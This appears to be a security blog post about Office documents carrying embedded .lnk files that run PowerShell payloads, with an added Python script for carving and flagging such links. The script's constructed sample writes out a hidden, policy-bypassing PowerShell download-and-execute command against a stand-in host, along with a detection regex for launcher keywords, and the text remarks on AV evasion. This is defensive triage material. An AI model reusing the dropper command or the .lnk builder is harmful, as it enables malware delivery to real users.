Using Office macros to exploit endpoints remains a popular technique. The user is shown a dialog box and must click through it for the attack to work, and most users will click, especially if the document looks like something they handle every day. That removes the attacker's need for an Office or browser zero-day and makes exploitation simpler and cheaper. It is also usually possible to tune a malicious macro to slip past security controls such as anti-virus, and toolkits like Luckystrike exist to ease macro exploit development.
Windows domains have controls (Office macro settings enforced through Group Policy) that can be turned on to block macros from executing, and there are security products that sandbox, scan, or even open untrusted documents inside VMs.
We began investigating an attack that hit one of our customers. We found that it was an Office document with an embedded link (.lnk) file. The user must click the image of the .lnk, and this is all but certain to happen.
When the exploit runs on the victim:
- The malicious LNK is detected, and its code is shown
- The payload is run with PowerShell
- The payload is noticed, but the hash is wrong because the file size is empty: the attackers had moved the malware site by the time we checked into this threat.
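The chain described above (Office document, embedded .lnk, PowerShell) is exactly what a triage script needs to surface before a user clicks. The following is an added example, not code from the original post or the vendor's tooling: a small Python parser for the .lnk header and StringData fields laid out in [MS-SHLLINK], plus a carver that pulls .lnk blobs out of an Office Open XML zip and flags the ones that look like PowerShell launchers. The sample document, the link targets, the indicator regex and the example.invalid URL are all constructed for the demonstration; they are not artefacts of the attack the post describes.

```python
"""Triage helper (added example): carve Windows Shell Link (.lnk) files out of an
OOXML document, parse their target and arguments, and flag PowerShell launchers.
Field layout follows [MS-SHLLINK]; all samples below are constructed inline."""
from __future__ import annotations

import io
import re
import struct
import zipfile

# HeaderSize (0x4C, little-endian) followed by LinkCLSID 00021401-0000-0000-C000-000000000046
LNK_MAGIC = b"\x4c\x00\x00\x00" + bytes.fromhex("0114020000000000c000000000000046")
HEADER_SIZE = 0x4C

# LinkFlags bits that change the on-disk layout after the fixed header
HAS_LINK_TARGET_ID_LIST = 1 << 0
HAS_LINK_INFO = 1 << 1
IS_UNICODE = 1 << 7
# StringData sections in on-disk order, each present only if its flag bit is set
STRING_FIELDS = ((1 << 2, "name"), (1 << 3, "relative_path"), (1 << 4, "working_dir"),
                 (1 << 5, "arguments"), (1 << 6, "icon_location"))

# Indicators a LNK-to-PowerShell dropper tends to carry (constructed heuristic, tune per estate)
SUSPICIOUS = re.compile(
    r"powershell|pwsh|-enc|-e\s|hidden|bypass|\biex\b|downloadstring|mshta|cmd(?:\.exe)?\s*/c",
    re.IGNORECASE)


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags plus the StringData fields (relative_path, arguments, ...) of a .lnk blob."""
    if data[:len(LNK_MAGIC)] != LNK_MAGIC:
        raise ValueError("not a shell link")
    (flags,) = struct.unpack_from("<I", data, 20)
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:       # IDListSize (2 bytes) then the item ID list
        (size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    if flags & HAS_LINK_INFO:                 # LinkInfoSize counts itself
        (size,) = struct.unpack_from("<I", data, pos)
        pos += size
    fields = {"flags": flags}
    width = 2 if flags & IS_UNICODE else 1
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            continue
        (count,) = struct.unpack_from("<H", data, pos)   # CountCharacters, no terminator
        pos += 2
        raw = data[pos:pos + count * width]
        pos += count * width
        fields[key] = raw.decode("utf-16-le" if width == 2 else "cp1252")
    return fields


def is_suspicious(lnk: dict) -> bool:
    """Does the link's target, arguments or icon path look like a PowerShell launcher?"""
    text = " ".join(lnk.get(key, "") for _, key in STRING_FIELDS)
    return SUSPICIOUS.search(text) is not None


def carve_lnks_from_ooxml(doc: bytes) -> list[dict]:
    """Scan every zip entry of a .docx/.xlsx/.pptx for the .lnk magic and parse each hit.
    Word keeps embedded objects under word/embeddings/, wrapped in an OLE container;
    the .lnk header is still byte-contiguous inside it, so carving on the magic works."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(doc)) as zf:
        for name in zf.namelist():
            blob = zf.read(name)
            start = 0
            while (idx := blob.find(LNK_MAGIC, start)) != -1:
                try:
                    lnk = parse_lnk(blob[idx:])
                    hits.append({"entry": name, "offset": idx, "lnk": lnk,
                                 "suspicious": is_suspicious(lnk)})
                except (struct.error, UnicodeDecodeError):
                    pass                      # truncated or damaged link: keep scanning
                start = idx + len(LNK_MAGIC)
    return hits


def build_lnk(relative_path: str, arguments: str = "", icon: str = "") -> bytes:
    """Construct a minimal Unicode .lnk carrying only the StringData we need (constructed sample)."""
    flags = IS_UNICODE | (1 << 3) | ((1 << 5) if arguments else 0) | ((1 << 6) if icon else 0)
    header = LNK_MAGIC + struct.pack("<I", flags)
    header += b"\x00" * (HEADER_SIZE - len(header))   # attributes, timestamps, size, icon, show cmd

    def field(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + field(relative_path) + (field(arguments) if arguments else b"") + (field(icon) if icon else b"")


def build_sample_docx() -> bytes:
    """A constructed .docx holding one PowerShell-launching .lnk and one harmless one."""
    dropper = build_lnk(
        "..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "-w hidden -nop -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')\"",
        "%SystemRoot%\\System32\\shell32.dll")  # borrowed icon so the object looks like a document
    benign = build_lnk("..\\Reports\\Q3-summary.pdf")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/embeddings/oleObject1.bin", b"\x00" * 64 + dropper)  # 64 zero bytes stand in for the OLE wrapper
        zf.writestr("word/embeddings/oleObject2.bin", b"\x00" * 64 + benign)
    return buf.getvalue()
```

Running `carve_lnks_from_ooxml(build_sample_docx())` returns two hits, the first flagged because its target ends in powershell.exe and its arguments carry `hidden`, `bypass`, `IEX` and `DownloadString`. On a real sample the same carver is pointed at the document's zip entries, and the parsed `arguments` field is what you pivot on for the hash and hosting site the post refers to.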
VT Shows the Doc to be Malicious
Only 19 of 55 anti-virus engines flagged the threat we found as malicious. Tweaking it to make the attack fresh enough to bypass all the AVs should be straightforward.
Summary
Embedded LNK files can and will be used to exploit enterprise systems. Expect attackers to use them to bypass even next-generation endpoint security controls.